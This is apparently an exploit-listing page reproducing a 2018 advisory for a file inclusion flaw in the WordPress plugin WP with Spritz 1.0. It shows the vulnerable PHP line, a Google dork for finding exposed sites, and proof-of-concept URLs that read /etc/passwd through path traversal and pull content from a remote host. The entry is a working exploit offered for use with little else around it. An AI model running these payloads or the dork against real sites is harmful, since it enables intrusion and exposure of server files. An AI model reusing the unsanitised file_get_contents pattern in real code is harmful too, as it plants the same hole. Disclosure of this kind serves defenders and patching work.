Advertisement






WordPress WP With Spritz 1.0 File Inclusion

CVE Category Price Severity
N/A CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-27
CPE
cpe:cpe:/a:wordpress:wordpress
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040215

Below is a copy:

WordPress WP With Spritz 1.0 File Inclusion
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps
 
 
1. Version Disclosure
 
/wp-content/plugins/wp-with-spritz/readme.txt
 
2. Source Code
 
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);
 
3. Proof of Concept
 
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum